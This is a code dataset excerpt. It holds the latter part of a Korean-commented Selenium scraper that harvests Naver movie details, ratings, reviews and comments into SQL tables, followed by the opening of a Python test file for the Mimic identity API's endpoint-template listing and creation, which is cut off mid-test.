li:nth-child('+str(i+1)+') > a').get_attribute('href'))\n except:\n break\n try:\n self.land_next_page()\n except:\n break\n return movie_urls\n #각 테이블에 삽입할 데이터 수집\n def get_movie_information(self, year):\n infos = []\n self.land_directory_of_year(year)\n movie_urls = self.get_movies_in_the_page()\n for i, url in enumerate(movie_urls):\n self.land_page(url)\n movie, jenre, image, video, director, casting, country, review = self.get_movie_info(i)\n infos.append([movie, jenre, image, video, director, casting, country, review])\n return infos\n #Movie 테이블 정보 수집\n def get_movie_table_info(self, movie_code, year):\n movie = [movie_code]\n try:\n movie.append(self.find_element_by_css_selector(\"#content > div.article > div.mv_info_area > div.mv_info > h3 > a\").text)\n except:\n movie.append(None)\n #original title\n try:\n movie.append(self.find_element_by_css_selector(\"#content > div.article > div.mv_info_area > div.mv_info > strong\").get_attribute(\"title\"))\n except:\n movie.append(None)\n #opening_date\n try:\n opening_date = self.find_element_by_class_name(\"step1\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[1]/p').text.split(\" \")[-3:-1]\n o_date = opening_date[0] + opening_date[1]\n if o_date.count('.')==2:\n movie.append(o_date.replace(\".\", \"-\"))\n elif o_date.count('.')==1:\n movie.append(o_date.replace(\".\", \"-\")+\"-01\")\n else:\n movie.append(str(year)+\"-01-01\")\n except:\n movie.append(None)\n #playing_time\n try:#\n 
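# The playing time is rendered as text like \"108분\" (\"분\" is Korean for minutes), so the\n            # scraper strips that suffix before casting the remainder to int.\n            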
movie.append(int((self.find_element_by_class_name(\"step1\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[1]/p/span[3]').text).replace(\"분\", \"\")))\n except:\n movie.append(None)\n #domestic_rate\n try:#\n movie.append(self.find_element_by_class_name(\"step4\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[4]/p/a').text)\n except:\n movie.append(None)\n #foreign_rate\n try:#\n movie.append(self.find_element_by_class_name(\"step4\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[4]/p/a[2]').text)\n except:\n movie.append(None)\n #cumulative_audience\n try:\n movie.append(int(self.find_element_by_class_name(\"step9\").find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[2]/div[1]/dl/dd[5]/div/p').text.split('(')[0].replace(\"명\", \"\").replace(\",\", \"\")))\n except:\n movie.append(None)\n #subtitle\n try:\n string = \"\"\n for txt in self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(1) > div > div > h5\"):\n string = string + txt.text\n if string==\"\":\n movie.append(None)\n else:\n movie.append(string.replace(\"\\n\",\" \"))\n except:\n movie.append(None)\n #content\n try:\n string = \"\"\n for txt in self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(1) > div > div > p\"):\n string = string + txt.text\n if string==\"\":\n movie.append(None)\n else:\n movie.append(string.replace(\"\\n\", \" \"))\n except:\n movie.append(None)\n #poster_url\n try:\n movie.append(self.find_element_by_css_selector(\"#content > div.article > div.mv_info_area > div.poster > a > img\").get_attribute(\"src\"))\n except:\n movie.append(None)\n #audience_rate\n try:\n movie.append(float(self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[1]').text \\\n + self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[2]').text \\\n + self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[3]').text \\\n + self.find_element_by_xpath('//*[@id=\"actualPointPersentBasic\"]/div/em[4]').text))\n except:\n movie.append(None)\n #journalist_rate\n try:\n movie.append(float(self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[1]').text \\\n + self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[2]').text \\\n + self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[3]').text \\\n + self.find_element_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/div[1]/div[2]/div/a/div/em[4]').text))\n except:\n movie.append(None)\n\n #netizen_rate\n try:\n movie.append(float(self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[1]').text \\\n + self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[2]').text \\\n + self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[3]').text \\\n + self.find_element_by_xpath('//*[@id=\"pointNetizenPersentBasic\"]/em[4]').text))\n except:\n movie.append(None)\n #audience_count\n self.get(self.current_url.replace(\"basic\", \"point\"))\n try:\n movie.append(int(self.find_element_by_class_name(\"grade_audience\").find_element_by_css_selector(\"#actual_point_tab_inner > span > em\").text))\n except:\n movie.append(None)\n #journalist_count\n try:\n movie.append(int(self.find_element_by_css_selector(\"#content > div.article > 
div.section_group.section_group_frst > div:nth-child(6) > div > div.title_area > span > em\").text))\n except:\n movie.append(None)\n #netizen_count\n try:\n movie.append(int(self.find_element_by_class_name(\"grade_netizen\").find_element_by_css_selector(\"#graph_area > div.grade_netizen > div.title_area.grade_tit > div.sc_area > span > em\").text))\n except:\n movie.append(None)\n self.back()\n\n return movie\n #영화(배우, 감독) 코드 추출\n def get_movie_code(self, url):\n # url = self.current_url\n print(\"movie URL: \", url)\n c_url = int(re.sub(\"([a-z])\\w+[-=+,#/\\?:^$.@*\\\"※~&%ㆍ!』\\\\‘|\\(\\)\\[\\]\\<\\>`\\'…》]|(\\/\\/)\", \"\", url))\n print(\"movie CODE: \", c_url)\n return c_url\n #리뷰 코드 추출\n def get_review_code(self):\n return int(re.sub(\"([a-z])\\w+[-=+,#/\\?:^$.@*\\\"※~&%ㆍ!』\\\\‘|\\(\\)\\[\\]\\<\\>`\\'…》]|(\\/\\/)|#(\\w+)\", \"\", self.current_url.split(\"&\")[0].replace(\"#\", \"\")))\n #배우 테이블 정보 수집\n def get_actor_table_info(self, movie_code):\n # actor : [actor_name, original_actor_name, actor_code]\n # movie_actor : [movie_code, cast, role, actor_code]\n actor = []\n movie_actor = [] #intersection table\n\n try:\n self.get(self.current_url.replace(\"basic\", \"detail\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n try:\n self.find_element_by_css_selector(\"#actorMore\").click() #펼쳐보기\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n pass\n\n num_actor = len(self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li > div > a\"))\n for i in range(num_actor):\n actor_one = []\n movie_actor_one = [movie_code]\n\n atr = self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li > div > a\")[i]\n \n #actor_name - actor\n actor_one.append(atr.text)\n #actor_original_name\n try:\n actor_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li:nth-child(\"+str(i+1)+\") > div > em\").text)\n except:\n actor_one.append(None)\n #cast - movie_actor\n try:\n movie_actor_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li:nth-child(\"+str(i+1)+\") > div > div > p.in_prt > em\").text)\n except:\n movie_actor_one.append(None)\n #role - movie_actor\n try:\n movie_actor_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div.obj_section.noline > div > div.lst_people_area.height100 > ul > li:nth-child(\"+str(i+1)+\") > div > div > p.pe_cmt > span\").text)\n except:\n movie_actor_one.append(None)\n \n atr.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n # actor_code\n actor_one.append(self.get_movie_code(self.current_url))\n movie_actor_one.append(self.get_movie_code(self.current_url))\n\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n\n try:\n self.find_element_by_css_selector(\"#actorMore\").click() #펼쳐보기\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n pass\n\n actor.append(actor_one)\n movie_actor.append(movie_actor_one)\n \n self.get(self.current_url.replace(\"detail\", \"basic\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n return actor, movie_actor\n except:\n return None, None\n #감독 테이블 정보 수집\n def 
get_director_table_info(self, movie_code):\n # director : [director_name, original_director_name, director_code]\n # movie_actor : [movie_code, director_code]\n director = []\n movie_director = [] #intersection table\n\n try:\n self.get(self.current_url.replace(\"basic\", \"detail\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n \n num_director = len(self.find_elements_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div > div > a\"))\n if num_director == 1:\n director_one = []\n movie_director_one = [movie_code]\n #director name\n d_name = self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div.dir_obj > div > a\")\n director_one.append(d_name.text)\n #director original name\n try:\n director_one.append(self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div.dir_obj > div > em\").text)\n except:\n director_one.append(None)\n\n d_name.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n director_one.append(self.get_movie_code(self.current_url))\n movie_director_one.append(self.get_movie_code(self.current_url))\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n \n director.append(director_one)\n movie_director.append(movie_director_one)\n else:\n for i in range(num_director):\n director_one = []\n movie_director_one = [movie_code]\n #director name\n d_name = self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div:nth-child(\"+str(i+2)+\") > div > a\")\n director_one.append(d_name.text)\n #director original name\n d_o_name = self.find_element_by_css_selector(\"#content > div.article > div.section_group.section_group_frst > div:nth-child(2) > div > div:nth-child(\"+str(i+2)+\") > div > em\").text\n if d_o_name == '':\n director_one.append(None)\n else:\n director_one.append(d_o_name)\n d_name.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n director_one.append(self.get_movie_code(self.current_url))\n movie_director_one.append(self.get_movie_code(self.current_url))\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n\n director.append(director_one)\n movie_director.append(movie_director_one)\n return director, movie_director\n except:\n return None, None\n #리뷰 테이블 정보 수집\n def get_review_table_info(self, movie_code):\n review = []\n movie_review = [] #intersection table\n review2 = []\n\n try:\n self.get(self.current_url.replace(\"basic\", \"review\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n num_review = int(self.find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[4]/div/div/div/div/div[2]/span/em').text.replace(\",\",\"\"))\n \n # if num_review%10==0:\n # num_page = int(num_review/10)\n # else:\n # num_page = int(num_review/10) + 1\n num_page = int(np.ceil(num_review/10))\n \n # print(\"start\")\n for page in range(1, num_page+1):\n if page == 2:\n break\n self.find_element_by_xpath('/html/body/div/div[4]/div[3]/div[1]/div[4]/div/div/div/div/div[3]/div/a['+str(page)+']/span').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n # print(page, \"페이지\")\n for i in range(10):\n # print(i, \"번째\")\n try:\n review_one = []\n movie_review_one = [movie_code]\n \n #id\n review_one.append(self.find_element_by_css_selector(\"#reviewTab > div > div > ul > li:nth-child(\"+str(i+1)+\") > span > a\").text)\n # print(\"--id\")\n #date\n try:\n 
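# The review date arrives as dot-separated text; replacing the dots with dashes below\n                        # yields an ISO-style date string.\n                        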
review_one.append(self.find_element_by_css_selector(\"#reviewTab > div > div > ul > li:nth-child(\"+str(i+1)+\") > span > em:nth-child(2)\").text.replace(\".\", \"-\"))\n except:\n review_one.append(None)\n # print(\"--date\")\n\n self.find_element_by_css_selector(\"#reviewTab > div > div > ul > li:nth-child(\"+str(i+1)+\") > a > strong\").click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n time.sleep(1)\n\n r_code = self.get_review_code()\n # print(r_code, \"리뷰 코드\")\n review_one.append(r_code)\n movie_review_one.append(r_code)\n \n #title\n try:\n review_one.append(self.find_element_by_css_selector(\"#content > div.article > div.obj_section.noline.center_obj > div.review > div.top_behavior > strong\").text)\n except:\n review_one.append(None)\n # print(\"--title\")\n #content\n len_content = len(self.find_element_by_class_name(\"user_tx_area\").find_elements_by_tag_name(\"p\"))\n content = \"\"\n for i in range(len_content):\n try:\n content = content + \" \" + self.find_element_by_css_selector(\"#content > div.article > div.obj_section.noline.center_obj > div.review > div.user_tx_area > p:nth-child(\"+str(i+1)+\")\").text\n except:\n pass\n #content > div.article > div.obj_section.noline.center_obj > div.review > div.user_tx_area > p:nth-child(11)\n if content==\"\":\n review_one.append(None)\n else:\n review_one.append(content)\n # print(\"--content\")\n #lookup\n try:\n review_one.append(int(self.find_element_by_css_selector(\"#content > div.article > div.obj_section.noline.center_obj > div.review > div.board_title > div > span:nth-child(1) > em\").text))\n except:\n review_one.append(None)\n # print(\"--lookup\")\n #recommend\n try:\n review_one.append(int(self.find_element_by_css_selector(\"#goodReviewCount\").text))\n except:\n review_one.append(None)\n # print(\"--recommend\")\n \n review2.extend(self.get_review2_table_info(r_code))\n review.append(review_one)\n movie_review.append(movie_review_one)\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n break\n\n return review, movie_review, review2\n except:\n return None, None, None\n #리뷰2(리뷰의 리뷰) 테이블 정보 수집\n def get_review2_table_info(self, r_code):\n review2 = []\n num_review2 = int(self.find_element_by_css_selector(\"#cbox_module > div > div.u_cbox_head > span\").text)\n if num_review2==0:\n pass\n else:\n num_page2 = int(np.ceil(num_review2/20))\n for page2 in range(num_page2):\n if page2 == 5:\n break\n elif page2 == 0:\n pass\n else:\n try:\n self.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div[5]/div/a['+str(page2)+']/span').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n except:\n break\n for i in range(20):\n try:\n review2_one = [r_code]\n #id\n review2_one.append(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[1]/span[1]/span/span/span/span').text)\n #content\n try:\n review2_one.append(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[2]').text)\n except:\n review2_one.append(None)\n #date\n try:\n review2_one.append(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[3]/span[1]').text)\n except:\n review2_one.append(None)\n #good\n try:\n review2_one.append(int(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[4]/div/a[1]/em').text))\n except:\n review2_one.append(None)\n #bad\n try:\n 
review2_one.append(int(self.find_element_by_xpath('//*[@id=\"cbox_module_wai_u_cbox_content_wrap_tabpanel\"]/ul/li['+str(i+1)+']/div[1]/div/div[4]/div/a[2]/em').text))\n except:\n review2_one.append(None)\n\n review2.append(review2_one)\n except:\n break\n\n return review2\n #이미지 테이블 정보 수집\n def get_image_table_info(self, movie_code, url):\n #[movie_code, image_url]\n self.get(self.current_url.replace(\"detail\", \"basic\"))\n try:\n self.get(url)\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n image = []\n for i in range(int(self.find_element_by_css_selector(\"#_MainPhotoArea > div.title_area > span > em\").text)):\n image_one = [movie_code]\n image_one.append(self.find_element_by_css_selector(\"#_MainPhotoArea > div.viewer > div > img\").get_attribute(\"src\"))\n image.append(image_one)\n self.find_element_by_css_selector(\"#_MainPhotoArea > div.viewer > a._NextBtn._NoOutline.pic_next\").click()\n if image==[]:\n return None\n else:\n return image\n except:\n return None\n #비디오 테이블 정보 수집\n def get_video_table_info(self, movie_code):\n #[movie_index, video_name, video_url]\n try:\n self.get(self.current_url.replace(\"basic\", \"media\"))\n video = []\n num_v = len(self.find_elements_by_css_selector(\"#content > div.article > div.obj_section2.noline > div > div.ifr_module > div > div > ul > li > p.tx_video.ico > a\"))\n for index in range(num_v):\n vd = self.find_elements_by_css_selector(\"#content > div.article > div.obj_section2.noline > div > div.ifr_module > div > div > ul > li > p.tx_video.ico > a\")[index]\n video_one = [movie_code]\n video_one.append(vd.text)\n vd.click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n video_one.append(self.current_url)\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n if video_one==[movie_code]:\n pass\n else:\n video.append(video_one)\n self.back()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n if video==[]:\n return None\n else:\n return video\n except:\n return None\n #장르 테이블 정보 수집\n def get_jenre_table_info(self, movie_code):\n #[movie_index, jenre_type]\n try:\n jenre = []\n for jnr in self.find_elements_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/dl/dd[1]/p/span[1]/a'):\n jenre_one = [movie_code]\n jenre_one.append(jnr.text)\n jenre.append(jenre_one)\n return jenre\n except:\n return None\n #국가 테이블 정보 수집\n def get_nation_table_info(self, movie_code):\n # [movie_code, country_name]\n try:\n nation = []\n for ctr in self.find_elements_by_xpath('//*[@id=\"content\"]/div[1]/div[2]/div[1]/dl/dd[1]/p/span[2]/a'):\n nation_one = [movie_code]\n nation_one.append(ctr.text)\n nation.append(nation_one)\n return nation\n except:\n return None\n #평점 테이블 정보 수집\n def get_point_table_info(self, movie_code):\n #[movie_code, point_content, point_id, point_date, point_good, point_bad, point_star]\n try:\n point = []\n self.get(self.current_url.replace(\"basic\", \"point\"))\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n self.switch_to.frame('pointAfterListIframe')\n num_point = int(self.find_element_by_css_selector(\"body > div > div > div.score_total > strong > em\").text.replace(\",\",\"\"))\n if num_point%10==0:\n num_page = int(num_point/10)\n else:\n num_page = int(num_point/10) + 1\n for page in range(1, num_page+1):\n if page==11:\n break\n elif page==1:\n pass\n else:\n self.find_element_by_css_selector(\"#pagerTagAnchor\"+str(page)+\" > em\").click()\n\n for i in range(10):\n try:\n point_one = [movie_code]\n #content\n content = self.find_element_by_css_selector(\"#_filtered_ment_\"+str(i)).text\n if content=='':\n 
point_one.append(None)\n else:\n point_one.append(content)\n #id\n point_one.append(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.score_reple > dl > dt > em:nth-child(1) > a > span\").text)\n #date\n point_one.append(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.score_reple > dl > dt > em:nth-child(2)\").text)\n #good\n point_one.append(int(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.btn_area > a._sympathyButton > strong\").text))\n #bad\n point_one.append(int(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.btn_area > a._notSympathyButton > strong\").text))\n #star\n point_one.append(int(self.find_element_by_css_selector(\"body > div > div > div.score_result > ul > li:nth-child(\"+str(i+1)+\") > div.star_score > em\").text))\n \n point.append(point_one)\n except:\n break\n self.get(self.current_url.replace(\"point\", \"basic\"))\n return point\n except:\n return None\n\nif __name__ == '__main__':\n #해당 연도 데이터 크롤링\n def get_all_of_year_main(year, user, start):\n crawler = Naver_scrapping()\n crawler.land_page()\n\n crawler.land_directory_of_year(year)\n movie_urls_of_year = crawler.get_movies_in_the_page()\n crawler.quit()\n #578\n for url in movie_urls_of_year[start:]:\n \n print(url)\n movie_table = []\n\n crawler = Naver_scrapping()\n\n\n crawler.get(url)\n crawler.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n\n\n print(\">>land page success\")\n\n movie_code = crawler.get_movie_code(url)\n\n print(\">>movie code complete\")\n\n try:\n movie_table.append(crawler.get_movie_table_info(movie_code, year))\n user.input_data(table = \"movie\",\n columns=\"movie_code, title, original_title, opening_date, \\\n playing_time, domestic_rate, foreign_rate, cumulative_audience, \\\n subtitle, content, poster_url, audience_rate, journalist_rate, \\\n netizen_rate, audience_count, journalist_count, netizen_count\", \n data=movie_table)\n print(\">>movie complete\")\n except:\n print(\">>movie failed ---\")\n # #actor & movie_actor\n try:\n actor, movie_actor = crawler.get_actor_table_info(movie_code)\n user.input_data(table = \"actor\",\n columns=\"actor_name, original_actor_name, actor_code\", \n data=actor)\n print(\">>actor complete\")\n except:\n print(\">>actor failed ---\")\n try:\n user.input_data(table = \"movie_actor\",\n columns=\"movie_code, cast, role, actor_code\", \n data=movie_actor)\n print(\">>movie actor complete\")\n except:\n print(\">>movie actor failed ---\")\n try:\n director, movie_director = crawler.get_director_table_info(movie_code)\n user.input_data(table = \"director\",\n columns=\"director_name, original_director_name, director_code\", \n data=director)\n print(\">>director complete\")\n except:\n print(\">>director failed ---\")\n try:\n user.input_data(table = \"movie_director\",\n columns=\"movie_code, director_code\", \n data=movie_director)\n print(\">>movie director complete\")\n except:\n print(\">>movie director failed ---\")\n \n try:\n user.input_data(table = \"image\",\n columns=\"movie_code, image_url\", \n data=crawler.get_image_table_info(movie_code, url))\n print(\">>image complete\")\n except:\n print(\">>image failed ---\")\n try:\n user.input_data(table = \"video\",\n columns=\"movie_code, video_title, video_url\", \n data=crawler.get_video_table_info(movie_code))\n print(\">>video 
complete\")\n except:\n print(\">>video failed ---\")\n try:\n user.input_data(table = \"jenre\",\n columns=\"movie_code, jenre_name\", \n data=crawler.get_jenre_table_info(movie_code))\n print(\">>jenre complete\")\n except:\n print(\">>jenre failed ---\")\n try:\n user.input_data(table = \"nation\",\n columns=\"movie_code, country\", \n data=crawler.get_nation_table_info(movie_code))\n print(\">>nation complete\")\n except:\n print(\">>nation failed ---\")\n try:\n user.input_data(table = \"point\",\n columns=\"movie_code, point_content, point_id, \\\n point_date, point_good, point_bad, point_star\", \n data=crawler.get_point_table_info(movie_code))\n print(\">>point complete\")\n except:\n print(\">>point failed ---\")\n\n review, movie_review, review2 = crawler.get_review_table_info(movie_code)\n print(\">>review function complete\")\n try:\n user.input_data(table = \"review\",\n columns=\"review_id, review_date, review_code, review_title, review_content, review_lookup, review_recommend\", \n data=review)\n print(\">>review complete\")\n except:\n print(\">>review failed ---\")\n try:\n user.input_data(table = \"movie_review\",\n columns=\"movie_code, review_code\", \n data=movie_review)\n print(\">>movie review complete\")\n except:\n print(\">>movie review failed ---\")\n try:\n user.input_data(table = \"review2\",\n columns=\"review_code, review2_id, review2_content, review2_date, review2_good, review2_bad\", \n data=review2)\n print(\">>review2 complete\")\n except:\n print(\">>review2 failed ---\")\n crawler.quit()\n \n hyojin = SQL(db=\"naver\", user=\"hyojin\", password=\"gywls\")\n get_all_of_year_main(2019, hyojin, 0)\n get_all_of_year_main(2018, hyojin, 0)\n get_all_of_year_main(2017, hyojin, 0)\n get_all_of_year_main(2016, hyojin, 0)\n get_all_of_year_main(2015, hyojin, 0)\n get_all_of_year_main(2014, hyojin, 0)\n get_all_of_year_main(2013, hyojin, 0)\n get_all_of_year_main(2012, hyojin, 0)","repo_name":"JONHYOJIN/DataBase","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":35496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39255762777","text":"\"\"\"\nTests for mimic identity :mod:`mimic.rest.identity_api`\n\"\"\"\n\nfrom __future__ import absolute_import, division, unicode_literals\n\nimport json\nimport uuid\n\nfrom six import text_type\n\nfrom twisted.trial.unittest import SynchronousTestCase\nfrom twisted.internet.task import Clock\n\nfrom mimic.core import MimicCore\nfrom mimic.resource import MimicRoot\nfrom mimic.test.dummy import (\n make_example_internal_api,\n make_example_external_api\n)\nfrom mimic.test.helpers import json_request, request, get_template_id\nfrom mimic.test.mixins import IdentityAuthMixin, InvalidJsonMixin, ServiceIdHeaderMixin\n\n\nclass TestIdentityOSKSCatalogTenantAdminEndpointTemplatesList(\n SynchronousTestCase, IdentityAuthMixin, ServiceIdHeaderMixin):\n \"\"\"\n Tests for ``/identity/v2.0//OS-KSCATALOG/endpointTemplates``,\n provided by :obj:`mimic.rest.idenity_api.IdentityApi`\n \"\"\"\n def setUp(self):\n self.tenant_id = 'some_tenant'\n self.core = MimicCore(Clock(), [])\n self.root = MimicRoot(self.core).app.resource()\n self.uri = (\n \"/identity/v2.0/tenants/\" + self.tenant_id +\n \"/OS-KSCATALOG/endpoints\"\n )\n self.eeapi_name = u\"externalServiceName\"\n self.eeapi = make_example_external_api(\n self,\n name=self.eeapi_name,\n set_enabled=True\n )\n self.headers = {\n b'X-Auth-Token': [b'ABCDEF987654321']\n }\n self.verb = 
b\"GET\"\n\n def test_list_only_internal_apis_available(self):\n \"\"\"\n GET will not list Internal APIs.\n \"\"\"\n self.core.add_api(make_example_internal_api(self))\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 0)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_list_single_template(self):\n \"\"\"\n GET will list an external API if it has a endpoint template.\n \"\"\"\n self.core.add_api(self.eeapi)\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 1)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_list_template_all_disabled(self):\n \"\"\"\n GET will not list endpoint templates that are disabled.\n \"\"\"\n self.core.add_api(self.eeapi)\n id_key = get_template_id(self, self.eeapi)\n self.eeapi.endpoint_templates[id_key].enabled_key = False\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 0)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_list_single_template_external_and_internal_apis(self):\n \"\"\"\n GET will only list external API endpoint templates.\n \"\"\"\n self.core.add_api(self.eeapi)\n self.core.add_api(make_example_internal_api(self))\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 200)\n self.assertEqual(len(json_body['endpoints']), 1)\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n def test_multiple_external_apis(self):\n \"\"\"\n GET will list multiple external APIs.\n \"\"\"\n api_list = [\n make_example_external_api(\n self,\n name=self.eeapi_name + text_type(uuid.uuid4()),\n service_type='service-' + text_type(uuid.uuid4()),\n set_enabled=True\n )\n for ignored in range(10)\n ]\n # eeapi should be the first entry in the list\n api_list.insert(0, self.eeapi)\n\n for api in api_list:\n self.core.add_api(api)\n\n self.assertEqual(len(self.core._uuid_to_api_external),\n len(api_list))\n\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n def get_header(header_name):\n return response.headers.getRawHeaders(header_name)[0].decode(\"utf-8\")\n\n self.assertEqual(response.code, 200)\n\n self.assertEqual(len(json_body['endpoints']),\n len(api_list))\n self.assertEqual(len(json_body['endpoints_links']), 0)\n\n\nclass TestIdentityOSKSCatalogTenantAdminEndpointTemplatesCreate(\n SynchronousTestCase, IdentityAuthMixin, InvalidJsonMixin):\n \"\"\"\n Tests for ``/identity/v2.0//OS-KSCATALOG/endpointTemplates``,\n provided by :obj:`mimic.rest.idenity_api.IdentityApi`\n \"\"\"\n def setUp(self):\n self.tenant_id = 'some_tenant'\n self.core = MimicCore(Clock(), [])\n self.root = MimicRoot(self.core).app.resource()\n self.uri = (\n \"/identity/v2.0/tenants/\" + self.tenant_id +\n \"/OS-KSCATALOG/endpoints\"\n )\n self.eeapi_name = u\"externalServiceName\"\n self.eeapi = make_example_external_api(\n self,\n name=self.eeapi_name,\n set_enabled=False\n )\n self.headers = {\n b'X-Auth-Token': [b'ABCDEF987654321']\n }\n 
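# self.verb, self.uri and self.headers set up here are presumably also what the mixin-provided\n        # cases (IdentityAuthMixin, InvalidJsonMixin) exercise, alongside the tests below.\n        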
self.verb = b\"POST\"\n\n def test_json_body_missing_required_field_oskscatalog(self):\n \"\"\"\n POST with the OS-KSCATALOG:endointTemplate body entirely missing\n results in 400.\n \"\"\"\n data = {\n 'id': text_type(uuid.uuid4()),\n }\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n body=data,\n headers=self.headers))\n\n self.assertEqual(response.code, 400)\n self.assertEqual(json_body['badRequest']['code'], 400)\n self.assertTrue(\n json_body['badRequest']['message'].startswith(\n \"Invalid Content. OS-KSCATALOG:endpointTemplate:id is \"\n \"required.\"\n )\n )\n\n def test_json_body_missing_required_field_template_id(self):\n \"\"\"\n POST with the OS-KSCATALOG:endointTemplate body missing it's content\n results in 400.\n \"\"\"\n data = {\n \"OS-KSCATALOG:endpointTemplate\": {\n }\n }\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n body=data,\n headers=self.headers))\n\n self.assertEqual(response.code, 400)\n self.assertEqual(json_body['badRequest']['code'], 400)\n self.assertTrue(\n json_body['badRequest']['message'].startswith(\n \"Invalid Content. OS-KSCATALOG:endpointTemplate:id is \"\n \"required.\"\n )\n )\n\n def test_invalid_template_id(self):\n \"\"\"\n POST with invalid endpointTemplate ID results in 404.\n \"\"\"\n self.core.add_api(self.eeapi)\n data = {\n 